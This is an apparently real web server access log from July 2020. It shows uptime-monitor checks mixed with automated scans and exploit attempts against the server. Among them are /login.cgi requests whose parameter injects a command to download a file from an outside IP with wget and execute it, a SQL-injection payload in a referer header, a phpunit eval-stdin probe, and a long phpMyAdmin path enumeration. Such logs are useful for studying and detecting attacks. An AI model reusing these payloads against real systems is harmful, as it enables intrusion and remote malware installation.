220.134.150.73 - - [02/Jul/2020:21:10:00 +0200] "GET / HTTP/1.1" 400 329 "-" "-"
212.91.246.72 - - [02/Jul/2020:21:10:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
118.24.22.175 - - [02/Jul/2020:21:11:21 +0200] "POST /w.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.108 Safari/537.36"
212.91.246.72 - - [02/Jul/2020:21:11:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
118.24.22.175 - - [02/Jul/2020:21:11:43 +0200] "POST /sheep.php HTTP/1.1" 404 314 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.108 Safari/537.36"
212.91.246.72 - - [02/Jul/2020:21:12:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
118.24.22.175 - - [02/Jul/2020:21:13:21 +0200] "GET /%73%65%65%79%6F%6E/%68%74%6D%6C%6F%66%66%69%63%65%73%65%72%76%6C%65%74 HTTP/1.1" 404 329 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
118.24.22.175 - - [02/Jul/2020:21:13:23 +0200] "GET /secure/ContactAdministrators!default.jspa HTTP/1.1" 404 346 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
118.24.22.175 - - [02/Jul/2020:21:13:23 +0200] "GET /weaver/bsh.servlet.BshServlet HTTP/1.1" 404 334 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
118.24.22.175 - - [02/Jul/2020:21:13:25 +0200] "GET /solr/ HTTP/1.1" 404 310 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
118.24.22.175 - - [02/Jul/2020:21:13:27 +0200] "GET /console/login/LoginForm.jsp HTTP/1.1" 404 332 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
118.24.22.175 - - [02/Jul/2020:21:13:27 +0200] "POST /index.php HTTP/1.1" 404 314 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
212.91.246.72 - - [02/Jul/2020:21:13:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Jul/2020:21:14:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
118.24.22.175 - - [02/Jul/2020:21:15:13 +0200] "POST /%75%73%65%72/%72%65%67%69%73%74%65%72?%65%6c%65%6d%65%6e%74%5f%70%61%72%65%6e%74%73=%74%69%6d%65%7a%6f%6e%65%2f%74%69%6d%65%7a%6f%6e%65%2f%23%76%61%6c%75%65&%61%6a%61%78%5f%66%6f%72%6d=1&%5f%77%72%61%70%70%65%72%5f%66%6f%72%6d%61%74=%64%72%75%70%61%6c%5f%61%6a%61%78 HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:28.0) Gecko/20100101 Firefox/28.0"
115.72.120.213 - - [02/Jul/2020:21:15:22 +0200] "GET / HTTP/1.1" 400 329 "-" "-"
212.91.246.72 - - [02/Jul/2020:21:15:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
220.132.26.54 - - [02/Jul/2020:21:16:28 +0200] "GET / HTTP/1.1" 400 329 "-" "-"
212.91.246.72 - - [02/Jul/2020:21:16:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
118.24.22.175 - - [02/Jul/2020:21:16:53 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)"
118.24.22.175 - - [02/Jul/2020:21:17:11 +0200] "GET /joomla/ HTTP/1.1" 404 312 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)"
45.141.86.190 - - [02/Jul/2020:21:17:30 +0200] "\x03" 501 316 "-" "-"
212.91.246.72 - - [02/Jul/2020:21:17:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.201.177.188 - - [02/Jul/2020:21:18:14 +0200] "GET /admin/login.asp HTTP/1.1" 400 329 "-" "-"
212.91.246.72 - - [02/Jul/2020:21:18:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
118.24.22.175 - - [02/Jul/2020:21:18:47 +0200] "GET /Joomla/ HTTP/1.1" 404 312 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)"
118.24.22.175 - - [02/Jul/2020:21:19:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)"
212.91.246.72 - - [02/Jul/2020:21:19:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
118.24.22.175 - - [02/Jul/2020:21:19:55 +0200] "GET /joomla/ HTTP/1.1" 404 312 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)"
83.97.20.21 - - [02/Jul/2020:21:20:01 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
212.91.246.72 - - [02/Jul/2020:21:20:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
83.97.20.31 - - [02/Jul/2020:21:21:05 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
212.91.246.72 - - [02/Jul/2020:21:21:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
118.24.22.175 - - [02/Jul/2020:21:21:42 +0200] "GET /Joomla/ HTTP/1.1" 404 312 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)"
36.224.216.215 - - [02/Jul/2020:21:21:49 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://45.95.168.126/d%20-O%20-%3E%20/tmp/ff;chmod%20+x%20/tmp/ff;sh%20/tmp/ff%27$ HTTP/1.1" 400 329 "-" "Rift/2.0"
212.91.246.72 - - [02/Jul/2020:21:22:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
118.24.22.175 - - [02/Jul/2020:21:23:09 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)"
172.104.108.109 - - [02/Jul/2020:21:23:16 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0"
212.91.246.72 - - [02/Jul/2020:21:23:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Jul/2020:21:24:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
195.54.160.135 - - [02/Jul/2020:21:24:36 +0200] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
118.24.22.175 - - [02/Jul/2020:21:24:48 +0200] "GET /joomla/ HTTP/1.1" 404 312 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)"
212.91.246.72 - - [02/Jul/2020:21:25:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
195.54.160.135 - - [02/Jul/2020:21:26:23 +0200] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
212.91.246.72 - - [02/Jul/2020:21:26:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
118.24.22.175 - - [02/Jul/2020:21:26:36 +0200] "GET /Joomla/ HTTP/1.1" 404 312 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)"
212.91.246.72 - - [02/Jul/2020:21:27:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
118.24.22.175 - - [02/Jul/2020:21:28:26 +0200] "POST /%75%73%65%72%2e%70%68%70 HTTP/1.1" 404 313 "554fcae493e564ee0dc75bdf2ebf94caads|a:3:{s:2:\"id\";s:3:\"'/*\";s:3:\"num\";s:141:\"*/ union select 1,0x272F2A,3,4,5,6,7,8,0x7b247b24524345275d3b6469652f2a2a2f286d6435284449524543544f52595f534550415241544f5229293b2f2f7d7d,0--\";s:4:\"name\";s:3:\"ads\";}554fcae493e564ee0dc75bdf2ebf94ca" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.91 Safari/537.36"
118.24.22.175 - - [02/Jul/2020:21:28:27 +0200] "GET /index.php HTTP/1.1" 404 314 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
118.24.22.175 - - [02/Jul/2020:21:28:29 +0200] "GET /phpmyadmin/index.php HTTP/1.1" 404 325 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
118.24.22.175 - - [02/Jul/2020:21:28:32 +0200] "GET /phpMyAdmin/index.php HTTP/1.1" 404 325 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
118.24.22.175 - - [02/Jul/2020:21:28:32 +0200] "GET /pmd/index.php HTTP/1.1" 404 318 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
118.24.22.175 - - [02/Jul/2020:21:28:33 +0200] "GET /pma/index.php HTTP/1.1" 404 318 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
118.24.22.175 - - [02/Jul/2020:21:28:35 +0200] "GET /PMA/index.php HTTP/1.1" 404 318 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
212.91.246.72 - - [02/Jul/2020:21:28:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
118.24.22.175 - - [02/Jul/2020:21:28:35 +0200] "GET /PMA2/index.php HTTP/1.1" 404 319 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
118.24.22.175 - - [02/Jul/2020:21:28:36 +0200] "GET /pmamy/index.php HTTP/1.1" 404 320 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
118.24.22.175 - - [02/Jul/2020:21:28:38 +0200] "GET /pmamy2/index.php HTTP/1.1" 404 321 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
118.24.22.175 - - [02/Jul/2020:21:28:42 +0200] "GET /mysql/index.php HTTP/1.1" 404 320 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
118.24.22.175 - - [02/Jul/2020:21:28:45 +0200] "GET /admin/index.php HTTP/1.1" 404 320 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
212.91.246.72 - - [02/Jul/2020:21:29:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.93.222.201 - - [02/Jul/2020:21:29:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
118.24.22.175 - - [02/Jul/2020:21:30:16 +0200] "GET /db/index.php HTTP/1.1" 404 317 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
118.24.22.175 - - [02/Jul/2020:21:30:16 +0200] "GET /dbadmin/index.php HTTP/1.1" 404 322 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
118.24.22.175 - - [02/Jul/2020:21:30:17 +0200] "GET /web/phpMyAdmin/index.php HTTP/1.1" 404 329 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
118.24.22.175 - - [02/Jul/2020:21:30:18 +0200] "GET /admin/pma/index.php HTTP/1.1" 404 324 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
118.24.22.175 - - [02/Jul/2020:21:30:18 +0200] "GET /admin/PMA/index.php HTTP/1.1" 404 324 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
118.24.22.175 - - [02/Jul/2020:21:30:19 +0200] "GET /admin/mysql/index.php HTTP/1.1" 404 326 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
118.24.22.175 - - [02/Jul/2020:21:30:19 +0200] "GET /admin/mysql2/index.php HTTP/1.1" 404 327 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
118.24.22.175 - - [02/Jul/2020:21:30:19 +0200] "GET /admin/phpmyadmin/index.php HTTP/1.1" 404 331 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
118.24.22.175 - - [02/Jul/2020:21:30:19 +0200] "GET /admin/phpMyAdmin/index.php HTTP/1.1" 404 331 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
118.24.22.175 - - [02/Jul/2020:21:30:20 +0200] "GET /admin/phpmyadmin2/index.php HTTP/1.1" 404 332 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
118.24.22.175 - - [02/Jul/2020:21:30:20 +0200] "GET /mysqladmin/index.php HTTP/1.1" 404 325 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
118.24.22.175 - - [02/Jul/2020:21:30:20 +0200] "GET /mysql-admin/index.php HTTP/1.1" 404 326 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
118.24.22.175 - - [02/Jul/2020:21:30:22 +0200] "GET /mysql_admin/index.php HTTP/1.1" 404 326 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
118.24.22.175 - - [02/Jul/2020:21:30:23 +0200] "GET /phpadmin/index.php HTTP/1.1" 404 323 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
118.24.22.175 - - [02/Jul/2020:21:30:23 +0200] "GET /phpAdmin/index.php HTTP/1.1" 404 323 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
118.24.22.175 - - [02/Jul/2020:21:30:26 +0200] "GET /phpmyadmin0/index.php HTTP/1.1" 404 326 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
118.24.22.175 - - [02/Jul/2020:21:30:26 +0200] "GET /phpmyadmin1/index.php HTTP/1.1" 404 326 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
118.24.22.175 - - [02/Jul/2020:21:30:27 +0200] "GET /phpmyadmin2/index.php HTTP/1.1" 404 326 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
118.24.22.175 - - [02/Jul/2020:21:30:30 +0200] "GET /phpMyAdmin-4.4.0/index.php HTTP/1.1" 404 331 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
118.24.22.175 - - [02/Jul/2020:21:30:31 +0200] "GET /phpMyAdmin4.8.0/index.php HTTP/1.1" 404 330 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
118.24.22.175 - - [02/Jul/2020:21:30:32 +0200] "GET /phpMyAdmin4.8.1/index.php HTTP/1.1" 404 330 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
118.24.22.175 - - [02/Jul/2020:21:30:33 +0200] "GET /phpMyAdmin4.8.2/index.php HTTP/1.1" 404 330 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
118.24.22.175 - - [02/Jul/2020:21:30:33 +0200] "GET /phpMyAdmin4.8.3/index.php HTTP/1.1" 404 330 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
118.24.22.175 - - [02/Jul/2020:21:30:35 +0200] "GET /phpMyAdmin4.8.4/index.php HTTP/1.1" 404 330 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
212.91.246.72 - - [02/Jul/2020:21:30:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
118.24.22.175 - - [02/Jul/2020:21:30:35 +0200] "GET /phpMyAdmin4.8.5/index.php HTTP/1.1" 404 330 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
118.24.22.175 - - [02/Jul/2020:21:30:37 +0200] "GET /myadmin/index.php HTTP/1.1" 404 322 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
118.24.22.175 - - [02/Jul/2020:21:30:47 +0200] "GET /myadmin2/index.php HTTP/1.1" 404 323 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
118.24.22.175 - - [02/Jul/2020:21:30:48 +0200] "GET /xampp/phpmyadmin/index.php HTTP/1.1" 404 331 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
118.24.22.175 - - [02/Jul/2020:21:30:48 +0200] "GET /phpMyadmin_bak/index.php HTTP/1.1" 404 329 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
118.24.22.175 - - [02/Jul/2020:21:30:49 +0200] "GET /www/phpMyAdmin/index.php HTTP/1.1" 404 329 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
118.24.22.175 - - [02/Jul/2020:21:30:50 +0200] "GET /tools/phpMyAdmin/index.php HTTP/1.1" 404 331 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
118.24.22.175 - - [02/Jul/2020:21:30:51 +0200] "GET /phpmyadmin-old/index.php HTTP/1.1" 404 329 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
118.24.22.175 - - [02/Jul/2020:21:30:52 +0200] "GET /phpMyAdminold/index.php HTTP/1.1" 404 328 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
118.24.22.175 - - [02/Jul/2020:21:31:01 +0200] "GET /phpMyAdmin.old/index.php HTTP/1.1" 404 329 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
118.24.22.175 - - [02/Jul/2020:21:31:07 +0200] "GET /pma-old/index.php HTTP/1.1" 404 322 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
61.63.42.162 - - [02/Jul/2020:21:31:11 +0200] "GET / HTTP/1.1" 400 329 "-" "-"
59.127.214.138 - - [02/Jul/2020:21:31:17 +0200] "GET / HTTP/1.1" 400 329 "-" "-"
212.91.246.72 - - [02/Jul/2020:21:31:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
36.237.131.66 - - [02/Jul/2020:21:31:42 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://45.95.168.126/d%20-O%20-%3E%20/tmp/ff;chmod%20+x%20/tmp/ff;sh%20/tmp/ff%27$ HTTP/1.1" 400 329 "-" "Rift/2.0"
212.91.246.72 - - [02/Jul/2020:21:32:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
118.24.22.175 - - [02/Jul/2020:21:32:47 +0200] "GET /claroline/phpMyAdmin/index.php HTTP/1.1" 404 335 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
118.24.22.175 - - [02/Jul/2020:21:33:03 +0200] "GET /typo3/phpmyadmin/index.php HTTP/1.1" 404 331 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
212.91.246.72 - - [02/Jul/2020:21:33:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
118.24.22.175 - - [02/Jul/2020:21:34:18 +0200] "GET /phpma/index.php HTTP/1.1" 404 320 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
118.24.22.175 - - [02/Jul/2020:21:34:18 +0200] "GET /phpmyadmin/phpmyadmin/index.php HTTP/1.1" 404 336 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
118.24.22.175 - - [02/Jul/2020:21:34:19 +0200] "GET /phpMyAdmin/phpMyAdmin/index.php HTTP/1.1" 404 336 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
118.24.22.175 - - [02/Jul/2020:21:34:21 +0200] "GET /phpMyAbmin/index.php HTTP/1.1" 404 325 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
118.24.22.175 - - [02/Jul/2020:21:34:22 +0200] "GET /phpMyAdmin__/index.php HTTP/1.1" 404 327 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
118.24.22.175 - - [02/Jul/2020:21:34:23 +0200] "GET /phpMyAdmin+++---/index.php HTTP/1.1" 404 331 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
118.24.22.175 - - [02/Jul/2020:21:34:23 +0200] "GET /v/index.php HTTP/1.1" 404 316 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
118.24.22.175 - - [02/Jul/2020:21:34:23 +0200] "GET /phpmyadm1n/index.php HTTP/1.1" 404 325 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
118.24.22.175 - - [02/Jul/2020:21:34:24 +0200] "GET /phpMyAdm1n/index.php HTTP/1.1" 404 325 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
118.24.22.175 - - [02/Jul/2020:21:34:25 +0200] "GET /shaAdmin/index.php HTTP/1.1" 404 323 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
118.24.22.175 - - [02/Jul/2020:21:34:30 +0200] "GET /phpMyadmi/index.php HTTP/1.1" 404 324 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
118.24.22.175 - - [02/Jul/2020:21:34:31 +0200] "GET /phpMyAdmion/index.php HTTP/1.1" 404 326 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
118.24.22.175 - - [02/Jul/2020:21:34:32 +0200] "GET /s/index.php HTTP/1.1" 404 316 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
118.24.22.175 - - [02/Jul/2020:21:34:32 +0200] "GET /MyAdmin/index.php HTTP/1.1" 404 322 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
118.24.22.175 - - [02/Jul/2020:21:34:33 +0200] "GET /phpMyAdmin1/index.php HTTP/1.1" 404 326 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
212.91.246.72 - - [02/Jul/2020:21:34:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
118.24.22.175 - - [02/Jul/2020:21:34:42 +0200] "GET /phpMyAdmin123/index.php HTTP/1.1" 404 328 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
118.24.22.175 - - [02/Jul/2020:21:34:47 +0200] "GET /pwd/index.php HTTP/1.1" 404 318 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
118.24.22.175 - - [02/Jul/2020:21:34:48 +0200] "GET /phpMyAdmina/index.php HTTP/1.1" 404 326 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
118.24.22.175 - - [02/Jul/2020:21:34:50 +0200] "GET /phpMydmin/index.php HTTP/1.1" 404 324 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
118.24.22.175 - - [02/Jul/2020:21:34:51 +0200] "GET /phpMyAdmins/index.php HTTP/1.1" 404 326 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
118.24.22.175 - - [02/Jul/2020:21:34:51 +0200] "GET /phpMyAdmin._/index.php HTTP/1.1" 404 327 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
118.24.22.175 - - [02/Jul/2020:21:34:52 +0200] "GET /phpMyAdmin._2/index.php HTTP/1.1" 404 328 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
80.93.187.124 - - [02/Jul/2020:21:35:05 +0200] "HEAD /dump.zip HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36"
211.20.249.78 - - [02/Jul/2020:21:35:16 +0200] "GET / HTTP/1.1" 400 329 "-" "-"
212.91.246.72 - - [02/Jul/2020:21:35:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
118.24.22.175 - - [02/Jul/2020:21:36:15 +0200] "GET /phpmyadmin2222/index.php HTTP/1.1" 404 329 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
118.24.22.175 - - [02/Jul/2020:21:36:16 +0200] "GET /phpMyAdmin333/index.php HTTP/1.1" 404 328 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
118.24.22.175 - - [02/Jul/2020:21:36:16 +0200] "GET /phpmyadmin3333/index.php HTTP/1.1" 404 329 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
118.24.22.175 - - [02/Jul/2020:21:36:17 +0200] "GET /php2MyAdmin/index.php HTTP/1.1" 404 326 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
118.24.22.175 - - [02/Jul/2020:21:36:17 +0200] "GET /phpiMyAdmin/index.php HTTP/1.1" 404 326 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
118.24.22.175 - - [02/Jul/2020:21:36:18 +0200] "GET /phpNyAdmin/index.php HTTP/1.1" 404 325 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
118.24.22.175 - - [02/Jul/2020:21:36:19 +0200] "GET /1/index.php HTTP/1.1" 404 316 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
118.24.22.175 - - [02/Jul/2020:21:36:20 +0200] "GET /download/index.php HTTP/1.1" 404 323 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
118.24.22.175 - - [02/Jul/2020:21:36:21 +0200] "GET /phpMyAdmin_111/index.php HTTP/1.1" 404 329 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
